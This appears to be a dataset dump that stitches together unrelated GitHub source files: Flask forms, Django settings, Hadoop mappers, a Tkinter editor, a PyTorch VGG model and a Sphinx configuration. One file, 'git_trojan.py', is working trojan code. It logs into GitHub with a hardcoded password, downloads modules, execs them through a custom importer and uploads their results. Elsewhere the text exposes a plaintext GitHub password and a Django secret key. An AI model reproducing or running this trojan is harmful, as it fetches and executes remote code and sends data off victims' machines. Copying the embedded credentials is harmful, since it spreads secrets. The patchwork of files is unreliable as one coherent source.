"TD3TrainingParameters",
]
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
62b66a05dc8aa5caa12aef9489257a5f1cadcf17 | f74a2f1918a05bc0138e873c8b5eb4cd71271841 | /myproject/forms.py | 81377bc7dd519bada602c33eef43d658535bd55c | [] | no_license | pratyu2364/Splitwisely | e31874ec548d4a373940c83aeb75a2dff10b8691 | e9c93592d722b95ca234802965666284df0680ee | refs/heads/main | 2023-07-05T05:08:10.359224 | 2021-08-26T14:50:12 | 2021-08-26T14:50:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | from flask_wtf import FlaskForm
from wtforms import StringField,PasswordField,SubmitField,IntegerField
from wtforms.validators import DataRequired,Email,EqualTo,Length
from wtforms import ValidationError
from flask_login import current_user
from myproject.models import User
#after Registration user must be able to login
class LoginForm(FlaskForm):
email = StringField('Email',validators = [DataRequired(),Email()])
password = PasswordField('Password',validators = [DataRequired()])
submit = SubmitField('Log in ')
class RegistrationForm(FlaskForm):
email = StringField('Email',validators = [DataRequired(),Email(message='Invalid Email')])
username = StringField('Username',validators = [DataRequired(),Length(min=3,max=32)])
password = PasswordField('Password',validators = [DataRequired(),EqualTo('pass_confirm',message = 'Passwords must match!'),Length(min=3)])
pass_confirm = PasswordField('Confirm Password',validators = [DataRequired()])
submit = SubmitField('Register')
def check_email(self,field):
if User.query.filter_by(email=field.data).first(): # to check that email has already been registered or not
raise ValidationError('Your email has been already registered!')
def check_username(self,field):
if User.query.filter_by(username=field.data).first(): # to check that username has already been taken or not
raise ValidationError('Username is taken!')
class HowToSplit(FlaskForm):
selection = IntegerField('Select the option number',validators=[DataRequired()])
submit = SubmitField('Submit')
| [
"noreply@github.com"
] | pratyu2364.noreply@github.com |
6e4883923ec5fb815e0167591e97e69a1cf130ba | 33c2d74877efa983accde279a31d2841f5a8d185 | /lists/index.py | 7e76f499e05f0b2a4bf05b3242b74f0adf5271af | [] | no_license | venkatsgithub1/Udacity_Intro_to_computer_science | 9ad9965b2bb536b335983d69aab289e5d6bd3304 | cfafeaf4455155ac91573aab2eed61892b24e520 | refs/heads/master | 2021-01-23T22:30:03.581923 | 2017-03-12T06:07:42 | 2017-03-12T06:07:42 | 83,582,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | list1=[1,2,3]
#below line prints out 1, 1 is the index in list list1 where value 2 is present.
print (list1.index(2))
#below line gives out error since 5 is not present in the list.
print (list1.index(5))
| [
"noreply@github.com"
] | venkatsgithub1.noreply@github.com |
763cb3ca80ef8fbf94b9a9dd217d51152ae230f2 | 683828e7321b8c0c775c7da0d60a333caa47873c | /mywebsite/settings.py | 78df12fe8215b5618f12b78025d8f069dbe58791 | [] | no_license | nqiu/mywebsite | 1d85bb0174af54d438b391ea7550bf3e52d4ea8b | a7485704d7bd1f7af2bcc894c1044a3a07fecc0c | refs/heads/master | 2021-01-10T05:49:11.568988 | 2016-01-13T02:32:05 | 2016-01-13T02:32:05 | 49,543,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,210 | py | """
Django settings for mywebsite project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_4px59f3g$5$x81*jw9pg$6s6-g1=w+@7b@q*#i4x7z1xfx!q2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'machines.apps.MachinesConfig'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mywebsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mywebsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"867217317@qq.com"
] | 867217317@qq.com |
037da2e8e79ccf29520c3c52f08d9ae1c51bbb6b | 734badcd6a79d5fd265e291192c39049ee582340 | /python/zp/primjer_09.07.py | 4528f9d2b2577830787f4f2ac7bd2c6b248378cc | [
"MIT"
] | permissive | jasarsoft/examples | 4411b819e1e066f8cb7b192e02332859aa8b86fe | d6fddfcb8c50c31fbfe170a3edd2b6c07890f13e | refs/heads/master | 2021-03-22T00:23:48.254571 | 2019-01-17T23:13:14 | 2019-01-17T23:13:14 | 101,574,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #varargs parametri
def total(inicijal = 5, *brojevi, **kljucnerijeci):
brojanje = inicijal
print(inicijal)
for broj in brojevi:
brojanje += broj
print("broj = ", broj)
print("brojanje = ", brojanje)
for rec in kljucnerijeci:
brojanje +=kljucnerijeci[rec]
print("kljucnerijeci = ", kljucnerijeci[rec])
return brojanje
print(total(10, 1, 2, 3, povrce = 50, voce = 100))
| [
"edinjasar14@gmail.com"
] | edinjasar14@gmail.com |
b98236ad34d200143fb4b568acf1a27b03dcc1ff | 4b476da7a780526512a42f7f62ef955e89361345 | /CW1-MapReduce/task6/mapper6.py | f22fa60c2cafedaa7060b432f64bc5b8961ca8e4 | [] | no_license | karoleks4/MapReduce-Hadoop-Exercises | bb072536c85ca696ee08d8405f30e0d60f7df250 | 1298ef6333f9c8532cda97b7dcd172d13b3128cb | refs/heads/master | 2020-03-29T02:20:42.183078 | 2018-09-19T10:26:38 | 2018-09-19T10:26:38 | 149,431,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #!/usr/bin/python
import sys
for line in sys.stdin:
line = line.strip().split()
print('{0} {1} {2}\t{3}'.format(line[0], line[1], line[2], line[4])) | [
"s1448320@sms.ed.ac.uk"
] | s1448320@sms.ed.ac.uk |
d8fc9aa6b18fb2f4bc50363b8a36ca7d158c1c44 | 08b998966c06dc50cd9372fe3e15d6599bcafbfb | /dotfiles/.ipython/profile_default/startup/10-pager.py | 57da300105eaebfc2a84c667499aeb36a6ca7a1d | [
"MIT"
] | permissive | chbrown/config | 77661fc8e485d5a8992114fd11e7eae383698b9b | ec8deb0bf756ff62f5599cb239c8ac11084d3d16 | refs/heads/master | 2021-06-06T10:13:24.401647 | 2021-02-22T15:03:54 | 2021-02-22T15:03:54 | 1,827,574 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | from __future__ import print_function
# IPython.core.hooks.show_in_pager doesn't cut it
import IPython.core.page
def page_printer(data, start=0, screen_lines=0, pager_cmd=None):
if isinstance(data, dict):
data = data['text/plain']
print(data)
IPython.core.page.page = page_printer
| [
"io@henrian.com"
] | io@henrian.com |
4dd0d222ec273cb9b09cc04b08fc9c26689d7e47 | 73f2acd50df85aaf7fd35864d38cf709e4dcdf2c | /oop.py | 4d8fc66a23ce394746ed6e4f7cc3e7ad0ceac3ce | [
"MIT"
] | permissive | PacktPublishing/Learn-Python-in-3-Hours- | 8cdfa0ace86a197fe09680799b44168a79c78752 | 2f7c2cca7cc612bd5f2290b2af93db514e50b047 | refs/heads/master | 2021-06-08T14:20:31.041189 | 2021-01-14T15:04:23 | 2021-01-14T15:04:23 | 123,421,832 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | class Chess:
def __init__(self, player_one, player_two):
self.player_one = player_one
self.player_two = player_two
self.winner = None
def checkmate(self, winner):
self.winner = winner
return self.winner
@staticmethod
def print_game_header():
print('GAME START: CHESS.')
@classmethod
def print_game_name(cls):
print('Chess')
game1 = Chess()
game1.print_game_header()
class Car:
def __init__(self, brand):
self.top_speed = 0.0
def go(self):
print('VRRROOOM')
class SuperCar(Car):
def name(self):
return 'Super Car'
class ElecticCar(Car):
def name(self):
return 'Electric Car'
| [
"sharanjeetk@packtpub.com"
] | sharanjeetk@packtpub.com |
ecd670f6035d91877ece5860650b515ff8b1bd99 | 4265f97771fe9ea316eaa2402075cde92e183ac5 | /euler-python/014.py | 84c7c7414073e92a607ad22609ca9c2a34cd6bc1 | [] | no_license | heinzelotto/project-euler-clojurepythonracket | 24bddcfa3ebc8d93f29f5f732a6b46763b057eba | d4a647f0637530c0ff2d283b7af03057c520d0cf | refs/heads/master | 2021-01-19T19:52:35.510501 | 2017-03-27T00:08:28 | 2017-03-27T00:08:28 | 83,729,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | def memoize(f):
memo = {}
def helper(x):
if x not in memo:
memo[x] = f(x)
return memo[x]
return helper
@memoize
def collatz(k):
#print("{}\n".format(k))
if (k == 1):
return 1
elif (k % 2 == 1):
return 1+collatz(3*k+1)
else:
return 1+collatz(k/2)
def euler_14_solution():
argmax = 1
for i in range(333332,1000000):
if(collatz(i) > collatz(argmax)):
argmax = i
return argmax
def main():
print(euler_14_solution())
main()
| [
"felix.monninger@gmail.com"
] | felix.monninger@gmail.com |
cd208bb675c06b6242fcfaf225bcc6382c16e642 | fff656ae1c39d02f221710272551edfeaef57e8a | /binary_tree.py | 96922422c84d8ecfdb31fc75f513325d2fb94e5a | [] | no_license | ShawHsing/Algorithms-and-Data-Structures | 54261122e9c6d9c552d36148863fb248b4537158 | d624fbbee6d17cb05eb72a3ee346cd33bb6d6b5c | refs/heads/master | 2021-05-10T10:50:14.666214 | 2018-02-11T07:27:00 | 2018-02-11T07:27:00 | 118,395,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | def binary_tree(r):
return [r, [], []]
def insert_left(root, new_branch):
t = root.pop(1)
if len(t) > 1:
root.insert(1, [new_branch, t, []])
else:
root.insert(1, [new_branch, [], []])
return root
def insert_right(root, new_branch):
t = root.pop(2)
if len(t) > 1:
root.insert(2, [new_branch, [],t])
else:
root.insert(2, [new_branch, [], []])
return root
def get_root_val(root):
return root[0]
def set_root_val(root, new_val):
root[0] = new_val
def get_left_child(root):
return root[1]
def get_right_child(root):
return root[2]
r = binary_tree(3)
insert_left(r, 4)
insert_left(r, 5)
insert_right(r, 6)
insert_right(r, 7)
l = get_left_child(r)
print(l)
set_root_val(l, 9)
print(r)
insert_left(l,11)
print(r)
print(get_right_child(get_right_child(r)))
| [
"cqyyxiaoxincooi@gmail.com"
] | cqyyxiaoxincooi@gmail.com |
ad4ce1eaa5ae202422239605f4675c436c4dc867 | c58bfad47103f35702eb4917af60447f4b593483 | /lib/massmailer/accountgen/163/generator.py | c692631a10bb13a8bff1cf44a6bb98999c8a21ff | [] | no_license | cironepa/MassMailer | 14b769fab87d392e1e8ec387b265d857a437657b | 369b73f3fcb19eeeaddbaa47000c3e28de9c821c | refs/heads/master | 2021-12-03T11:16:18.813908 | 2014-05-22T15:43:18 | 2014-05-22T15:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | __author__ = 'zhoubangtao'
from massmailer.accountgen.account_generator import AccountGenerator
class Generator():
pass
| [
"zhoubangtao@163.com"
] | zhoubangtao@163.com |
7d37a037f5e68b510438a62a30a7ec35ae547019 | 8426e1bc5dc7041f4cf545ce14773abfc60599d5 | /python/armstrong-numbers/armstrong_numbers.py | bf2cf3e3edbedf1fc6ba66c019f9dab30d1a2678 | [] | no_license | Pujith-M/Exercism-Solutions | 520c959e4b84a68905315bd73b4cc336f937d7c2 | 89ff8d543d76834e44ea89bc34fca97b68e14fe9 | refs/heads/master | 2021-09-08T00:50:38.510200 | 2018-03-04T18:27:23 | 2018-03-04T18:27:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | def is_armstrong(number):
return number == reduce(lambda x, y: y ** len(str(number)) + x, [0] + map(int,list(str(number)))):
| [
"pujith.m95@gmail.com"
] | pujith.m95@gmail.com |
d051ac840dd580abefff5f521a92337bda35a2f2 | 961e1882fbc942af188c724da6c4209e8080270b | /main.py | 2d6ee562ef52e6ee4e4447a06d4e771190db67b1 | [
"MIT"
] | permissive | lasithadilshan/myFantasticPythonIDE | 34d72c7f3d89606a45f38bb76b7b36fdc4cb3014 | 2aae0750272e6ac3c6ba02dc1883c49006b8b7fe | refs/heads/master | 2023-05-07T16:52:45.805112 | 2021-05-31T17:07:24 | 2021-05-31T17:07:24 | 372,568,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | from tkinter import *
from tkinter.filedialog import asksaveasfilename, askopenfilename
import subprocess
compiler = Tk()
compiler.title('My Fantastic Python IDE')
file_path = ''
def set_file_path(path):
global file_path
file_path = path
def open_file():
path = askopenfilename(filetypes=[('Python Files', '*.py')])
with open(path, 'r') as file:
code = file.read()
editor.delete('1.0', END)
editor.insert('1.0', code)
set_file_path(path)
def save_as():
if file_path == '':
path = asksaveasfilename(filetypes=[('Python Files', '*.py')])
else:
path = file_path
with open(path, 'w') as file:
code = editor.get('1.0', END)
file.write(code)
set_file_path(path)
def run():
if file_path == '':
save_prompt = Toplevel()
text = Label(save_prompt, text='Please save your code')
text.pack()
return
command = f'python {file_path}'
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate()
code_output.insert('1.0', output)
code_output.insert('1.0', error)
menu_bar = Menu(compiler)
file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label='Open', command=open_file)
file_menu.add_command(label='Save', command=save_as)
file_menu.add_command(label='Save As', command=save_as)
file_menu.add_command(label='Exit', command=exit)
menu_bar.add_cascade(label='File', menu=file_menu)
run_bar = Menu(menu_bar, tearoff=0)
run_bar.add_command(label='Run', command=run)
menu_bar.add_cascade(label='Run', menu=run_bar)
compiler.config(menu=menu_bar)
editor = Text()
editor.pack()
code_output = Text(height=10)
code_output.pack()
compiler.mainloop()
| [
"37534587+lasithadilshan@users.noreply.github.com"
] | 37534587+lasithadilshan@users.noreply.github.com |
4ba5ee26b6542dc7c72c0baac9c4df66604e8c89 | 313fd16e8707fd39b9c8d7ed220beb29b3ede9c8 | /ash_project/ash_app/migrations/0001_initial.py | f72fa246e5a7582065ecacb5deeb393e5c9b5c49 | [] | no_license | sriram182001/django-ashwin | e3a55b3770f15cb1bd2669d224b9a4d52b7185fb | 9a934f9e12cce4dd543fea3b010978a09dc6007a | refs/heads/master | 2022-12-04T14:17:41.936433 | 2020-07-10T12:46:48 | 2020-07-10T12:46:48 | 278,625,367 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # Generated by Django 3.0.3 on 2020-07-10 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UserPhoto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_pic', models.ImageField(upload_to='picture')),
],
),
]
| [
"jjsriram09@gmail.com"
] | jjsriram09@gmail.com |
3ea5e8c2dbe5ce53d591ab42f36cb361afb49c3c | 3f3f797d5472bc3e78c16036017b03ae5f502c91 | /git_trojan.py | f3acf95280fbf1f405bf5e4f80d1e3bc085d1957 | [] | no_license | snowkingbewin/trotest | 48ab15a3c105a986e964fd157f131f26bd3226fb | 6c12508443be111c5affa79439849f5bbb8be36c | refs/heads/master | 2021-05-15T07:33:36.306917 | 2017-11-11T16:45:14 | 2017-11-11T16:45:14 | 110,333,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = Queue.Queue()
def connect_to_github():
gh = login(username="snowkingbewin", password="lovelyb123")
repo = gh.repository('snowkingbewin', 'trotest')
branch = repo.branch('master')
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print '[*] Foud file %s' % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec('import %s' % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = 'data/%s/%d.data' % (trojan_id, random.randint(1000, 10000))
repo.create_file(remote_path, 'commit message', base64.b64decode(data))
return
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print '[*] Attempting to retrieve %s' % fullname
new_library = get_file_contents('modules/%s' % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
store_module_result(result)
return
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random(1, 5))
time.sleep(random.randint(1000, 10000))
| [
"1164984406@qq.com"
] | 1164984406@qq.com |
f023b96d1bcc10da7a3a00e98c2a26e6526415ec | b6e7e7c0a68621c613898534f20de96c459fd0a9 | /client/app.py | 9999fc5bcf65ae1e09cde1f359f971321fe32177 | [] | no_license | jwoglom/zoom-tools | 227db0974c7ac239b9ea51b6e95222c765025d66 | 951b20970a990f3b293c593d3969c92550120913 | refs/heads/main | 2023-03-07T18:00:02.646547 | 2021-02-16T21:33:16 | 2021-02-16T21:33:16 | 339,311,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | #!/usr/bin/env python3
from flask import Flask, Response, request, abort
import random
import string
import subprocess
import os
app = Flask(__name__)
scripts_dir = os.path.join(os.path.dirname(__file__), "../scripts")
token = os.environ.get("TOKEN", "".join(random.choice(string.ascii_letters) for i in range(24)))
try:
from secrets import SELF_TOKEN
token = SELF_TOKEN
except ImportError:
pass
print("Token: %s" % token)
@app.before_request
def is_token_set():
provided_token = request.args.get("token") or request.form.get("token")
if provided_token != token:
print("Provided invalid token %s" % provided_token)
abort(403)
def run(script):
print(os.path.join(scripts_dir, script))
s = subprocess.run([os.path.join(scripts_dir, script)], capture_output=True)
return s.stdout.decode()
@app.route('/status', methods=['GET', 'POST'])
def status_route():
return run("zoom_status.sh")
@app.route('/audio', methods=['GET', 'POST'])
def audio_route():
return run("zoom_audio_status.sh")
@app.route('/audio/mute', methods=['GET', 'POST'])
def mute_route():
return run("zoom_mute.sh")
@app.route('/audio/unmute', methods=['GET', 'POST'])
def unmute_route():
return run("zoom_unmute.sh")
@app.route('/audio/toggle', methods=['GET', 'POST'])
def audio_toggle_route():
return run("zoom_audio_toggle.sh")
@app.route('/video', methods=['GET', 'POST'])
def video_route():
return run("zoom_video_status.sh")
@app.route('/video/off', methods=['GET', 'POST'])
def video_off_route():
return run("zoom_video_off.sh")
@app.route('/video/on', methods=['GET', 'POST'])
def video_on_route():
return run("zoom_video_on.sh")
@app.route('/video/toggle', methods=['GET', 'POST'])
def video_toggle_route():
return run("zoom_video_toggle.sh")
if __name__ == '__main__':
app.run('0.0.0.0', port=2626) | [
"j@wogloms.net"
] | j@wogloms.net |
4868d1dff9cc41c8268b865ff7b8ec0d5e5143ac | be2efcca89229247bf0122e2639fe1ff969f152a | /models/vgg.py | 80d3c1b7c057fa345dd9fb206e9f3a2c809f760e | [
"MIT"
] | permissive | hsilva664/amc | ff026a6649227f0ee8892248d28bf11a9c47e192 | 801ade50c73068aac2e8f346ef731816ca3683e3 | refs/heads/master | 2022-12-02T19:19:39.417294 | 2020-08-15T15:16:48 | 2020-08-15T15:16:48 | 287,330,024 | 0 | 0 | MIT | 2020-08-13T16:34:11 | 2020-08-13T16:34:10 | null | UTF-8 | Python | false | false | 3,641 | py | import torch.nn as nn
import math
from torch.nn import init
import torch.nn.functional as F
class VGG(nn.Module):
def __init__(self):
super(VGG, self).__init__()
in_channels = 3
Conv = nn.Conv2d
Linear = nn.Linear
self.pool = nn.MaxPool2d(2)
self.avgpool = nn.AvgPool2d(2)
self.relu = nn.ReLU(True)
self.conv1 = Conv(in_channels, 64, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(64)
self.conv2 = Conv(64, 64, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(64)
self.conv3 = Conv(64, 128, 3, 1, 1)
self.bn3 = nn.BatchNorm2d(128)
self.conv4 = Conv(128, 128, 3, 1, 1)
self.bn4 = nn.BatchNorm2d(128)
self.conv5 = Conv(128, 256, 3, 1, 1)
self.bn5 = nn.BatchNorm2d(256)
self.conv6 = Conv(256, 256, 3, 1, 1)
self.bn6 = nn.BatchNorm2d(256)
self.conv7 = Conv(256, 256, 3, 1, 1)
self.bn7 = nn.BatchNorm2d(256)
self.conv8 = Conv(256, 256, 3, 1, 1)
self.bn8 = nn.BatchNorm2d(256)
self.conv9 = Conv(256, 512, 3, 1, 1)
self.bn9 = nn.BatchNorm2d(512)
self.conv10 = Conv(512, 512, 3, 1, 1)
self.bn10 = nn.BatchNorm2d(512)
self.conv11 = Conv(512, 512, 3, 1, 1)
self.bn11 = nn.BatchNorm2d(512)
self.conv12 = Conv(512, 512, 3, 1, 1)
self.bn12 = nn.BatchNorm2d(512)
self.conv13 = Conv(512, 512, 3, 1, 1)
self.bn13 = nn.BatchNorm2d(512)
self.conv14 = Conv(512, 512, 3, 1, 1)
self.bn14 = nn.BatchNorm2d(512)
self.conv15 = Conv(512, 512, 3, 1, 1)
self.bn15 = nn.BatchNorm2d(512)
self.conv16 = Conv(512, 512, 3, 1, 1)
self.bn16 = nn.BatchNorm2d(512)
self.linear1 = nn.Linear(512, 10)
self.prunable = [self.conv1, self.conv2, self.conv3, self.conv4, self.conv5, self.conv6, self.conv7, self.conv8, self.conv9, self.conv10, self.conv11, self.conv12, self.conv13, self.conv14, self.conv15, self.conv16]
for m in self.modules():
if isinstance(m, nn.Conv2d):
init.xavier_normal_(m.weight)
if isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
init.xavier_normal_(m.weight)
m.bias.data.zero_()
def forward(self, x):
x = self.conv1(x)
x = self.conv2(self.relu(self.bn1(x)))
x = self.pool(self.relu(self.bn2(x)))
x = self.conv3(x)
x = self.conv4(self.relu(self.bn3(x)))
x = self.pool(self.relu(self.bn4(x)))
x = self.conv5(x)
x = self.conv6(self.relu(self.bn5(x)))
x = self.conv7(self.relu(self.bn6(x)))
x = self.conv8(self.relu(self.bn7(x)))
x = self.pool(self.relu(self.bn8(x)))
x = self.conv9(x)
x = self.conv10(self.relu(self.bn9(x)))
x = self.conv11(self.relu(self.bn10(x)))
x = self.conv12(self.relu(self.bn11(x)))
x = self.pool(self.relu(self.bn12(x)))
x = self.conv13(x)
x = self.conv14(self.relu(self.bn13(x)))
x = self.conv15(self.relu(self.bn14(x)))
x = self.conv16(self.relu(self.bn15(x)))
x = self.relu(self.bn16(x))
x = self.avgpool(x).squeeze()
x = self.linear1(x)
return x | [
"hsilva664"
] | hsilva664 |
1489caa6ecc1418fcca6f59a6452f6045f77b738 | e0980f704a573894350e285f66f4cf390837238e | /.history/streams/blocks_20201019093841.py | 6cccc214eeeb11cc10ee902cc92078eda7e0e6c4 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from wagtail.core import blocks
class TitleBlock(blocks.StructBlock):
text = blocks.Char | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
214aa11f83be4362189f74450e66ee6346751255 | 02774702ffa5bac8f1e19322254b0f96e7ae2e30 | /doc/conf.py | 5ba02964b2fa0e29fac03296e845e7eeed025093 | [
"BSD-3-Clause"
] | permissive | hiperiondev/ufsm | f10ae78d635644f9b00286dd78e8ade944845a3d | 1b8a51dea78438107523850705f70b41c27100f3 | refs/heads/master | 2023-05-26T14:53:37.733721 | 2023-02-07T20:12:48 | 2023-02-07T20:12:48 | 261,609,005 | 0 | 0 | NOASSERTION | 2020-05-05T23:55:37 | 2020-05-05T23:55:36 | null | UTF-8 | Python | false | false | 9,803 | py | # -*- coding: utf-8 -*-
import sys
import os
import shlex
import sphinx_rtd_theme
import alabaster
import subprocess
# sys.path.append("../python")
# import bpak
read_the_docs_build = os.environ.get('READTHEDOCS', None) == 'True'
if read_the_docs_build:
subprocess.call('doxygen doxygen.cfg', shell=True)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
breathe_projects = {
"ufsm":"xml/",
}
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"alabaster",
"breathe",
"sphinx.ext.extlinks",
"sphinx.ext.autodoc",
"sphinx.ext.viewcode",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ufsm'
copyright = u'2022 Jonas Blixt'
author = u'Jonas Blixt'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The name of the branch/tag on github
with open("../version.txt") as f:
version = f.read().strip()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_build',
"README.rst"
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = "alabaster"
html_theme = 'sphinx_rtd_theme'
#html_theme = 'pydoctheme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {'collapsiblesidebar': True}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
#html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
